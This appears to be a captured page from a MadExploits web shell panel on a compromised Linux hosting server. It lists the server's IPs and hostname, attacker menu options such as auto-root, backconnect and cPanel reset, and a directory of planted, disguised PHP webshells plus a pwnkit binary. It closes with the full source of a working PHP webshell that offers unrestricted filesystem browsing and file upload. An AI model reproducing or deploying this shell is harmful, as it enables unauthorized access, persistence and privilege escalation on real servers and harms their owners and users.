Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
tudosorte.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.buy.php
579
B
-rw-r--r--
.documentroot.php
280
B
-rw-r--r--
.goods.php
577
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.wp-esp.php
577
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
209
B
-rw-r--r--
bero.pHtML
44.85
KB
-rw-r--r--
berofc.php
44.85
KB
-rw-r--r--
bw.php
9.51
KB
-rw-r--r--
dataat.pHtML
16
KB
-rw-r--r--
default.xml
402
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
error_log
27.57
KB
-rw-r--r--
error_log.pHtML
28.62
KB
-rw-r--r--
error_log.php
28.62
KB
-rw-r--r--
finalkitaya.PHP
6.86
KB
-rw-r--r--
googlef7118cfda07b48b4.html
53
B
-rw-r--r--
index.php
381.47
KB
-rw-r--r--
logssss.pHtML
3.12
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
perantaraupload.php
6.02
KB
-rw-r--r--
php.ini
40
B
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
tes110000.pHtML
5.63
KB
-rw-r--r--
uploa.pHtML
6.02
KB
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
没啥.php
13.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tes110000.pHtML
<?php error_reporting(0); ini_set('display_errors', 0); // === KONFIGURASI KEAMANAN === define('BASE_DIR', __DIR__); // default sandbox define('ALLOW_UNRESTRICTED', true); // true agar bisa akses root & direktori lain // === UTIL === function normalise_slashes($p) { return str_replace(['\\','/'], DIRECTORY_SEPARATOR, $p); } function rel_for_url($p) { return str_replace(DIRECTORY_SEPARATOR, '/', $p); } function resolve_directory($requested) { $baseReal = realpath(BASE_DIR); $requested = (string)$requested; $requested = trim($requested, " \t\n\r\0\x0B"); // jangan trim slash if ($requested === '') return $baseReal; if (ALLOW_UNRESTRICTED) { $real = realpath($requested); return $real ? $real : $requested; } else { $real = realpath($baseReal . DIRECTORY_SEPARATOR . $requested); if ($real && strpos($real, $baseReal) === 0) return $real; return $baseReal; } } // === INIT === $directory = isset($_GET['dir']) ? resolve_directory($_GET['dir']) : BASE_DIR; if (!is_dir($directory)) $directory = BASE_DIR; // === SERVER INFO === $server_info = [ "OS" => php_uname(), "Server IP" => $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname()), "Client IP" => $_SERVER['REMOTE_ADDR'] ?? "Unknown", "PHP Version" => phpversion(), "Server Software" => $_SERVER['SERVER_SOFTWARE'] ?? "Unknown", "Current User" => get_current_user(), "Disable Functions" => ini_get("disable_functions") ?: "None", "Memory Limit" => ini_get("memory_limit"), "Max Upload" => ini_get("upload_max_filesize"), "Post Max Size" => ini_get("post_max_size"), ]; // === PESAN NOTIF === $messages = []; // === UPLOAD HANDLER === if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'upload' && isset($_FILES['files'])) { if (!is_dir($directory) || !is_writable($directory)) { $messages[] = ['err' => "Direktori tidak writable: " . htmlspecialchars($directory)]; } else { $files = $_FILES['files']; $count = is_array($files['name']) ? count($files['name']) : 1; for ($i=0; $i<$count; $i++) { $name = is_array($files['name']) ? $files['name'][$i] : $files['name']; $tmp = is_array($files['tmp_name']) ? $files['tmp_name'][$i] : $files['tmp_name']; $err = is_array($files['error']) ? $files['error'][$i] : $files['error']; $orig = basename($name); $safe = preg_replace('/[^A-Za-z0-9_\-\. ]/', '_', $orig); if ($err !== UPLOAD_ERR_OK) { $messages[] = ['err'=>"Gagal upload $orig (err:$err)"]; continue; } if (!is_uploaded_file($tmp)) { $messages[] = ['err'=>"File tmp hilang: $orig"]; continue; } $dest = rtrim($directory,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$safe; if (file_exists($dest)) $dest = rtrim($directory,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.uniqid().'_'.$safe; if (move_uploaded_file($tmp, $dest)) $messages[] = ['ok'=>"Uploaded: $safe"]; else $messages[] = ['err'=>"Gagal memindahkan $orig ke $dest"]; } } } // === BACA ISI FOLDER === $files = @scandir($directory) ?: []; $files = array_diff($files, ['.','..']); $dirs=[]; $regular=[]; foreach($files as $f){ $p=$directory.DIRECTORY_SEPARATOR.$f; if(is_dir($p)) $dirs[]=$f; else $regular[]=$f; } $sorted = array_merge($dirs,$regular); // === BREADCRUMB === $parts = explode(DIRECTORY_SEPARATOR, $directory); $crumbs = []; $path_accum = ''; foreach ($parts as $part) { if ($part === '') { $path_accum = DIRECTORY_SEPARATOR; $crumbs[] = ['name'=>'/', 'path'=>$path_accum]; continue; } $path_accum = rtrim($path_accum,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$part; $crumbs[] = ['name'=>$part, 'path'=>$path_accum]; } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>File Manager</title> <style> body{font-family:monospace;background:#111;color:#eee;} a{color:#1abc9c;text-decoration:none;} a:hover{text-decoration:underline;} .box{background:#222;padding:6px;margin:4px 0;border-radius:4px;} .msg-ok{background:#2d7;color:#fff;padding:4px;margin:3px 0;} .msg-err{background:#c33;color:#fff;padding:4px;margin:3px 0;} .breadcrumb a{color:#f39c12;margin-right:5px;} </style> </head> <body> <h2>Server Info</h2> <table border="1" cellpadding="4" cellspacing="0"> <?php foreach($server_info as $k=>$v): ?> <tr><td><b><?php echo htmlspecialchars($k);?></b></td><td><?php echo htmlspecialchars($v);?></td></tr> <?php endforeach;?> </table> <h2>Directory:</h2> <div class="breadcrumb"> <?php foreach($crumbs as $c): ?> <a href="?dir=<?php echo urlencode($c['path']);?>"><?php echo htmlspecialchars($c['name']);?></a> / <?php endforeach; ?> </div> <?php foreach($messages as $m): ?> <div class="<?php echo isset($m['ok'])?'msg-ok':'msg-err';?>"> <?php echo htmlspecialchars(reset($m));?> </div> <?php endforeach; ?> <ul> <?php foreach($sorted as $f): ?> <li> <?php if(is_dir($directory.DIRECTORY_SEPARATOR.$f)): ?> 📁 <a href="?dir=<?php echo urlencode($directory.DIRECTORY_SEPARATOR.$f);?>"><?php echo $f;?></a> <?php else: ?> 📄 <?php echo $f;?> <?php endif; ?> </li> <?php endforeach;?> </ul> <div class="box"> <h3>Upload Files</h3> <form method="post" enctype="multipart/form-data" action="?dir=<?php echo urlencode(rel_for_url($directory));?>"> <input type="hidden" name="action" value="upload"> <input type="file" name="files[]" multiple> <button type="submit">Upload</button> </form> </div> </body> </html>
Close
